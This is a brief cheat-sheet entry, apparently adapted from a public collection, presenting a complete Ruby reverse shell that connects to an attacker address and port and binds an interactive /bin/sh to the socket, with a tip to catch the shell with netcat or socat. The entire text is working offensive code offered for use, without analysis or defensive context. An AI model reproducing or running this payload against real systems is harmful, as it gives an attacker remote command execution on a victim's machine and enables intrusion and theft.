Note Adapted from slyth11907 / Cheatsheets / Cheatsheet_ReverseShells. A simple reverse shell: require "socket" attacker_ip = "10.0.0.1" attacker_port = 1234 f = TCPSocket.open(attacker_ip, attacker_port).to_i exec sprintf("/bin/sh -i <&%d >&%d 2>&%d", f, f, f) Catch it with netcat or socat.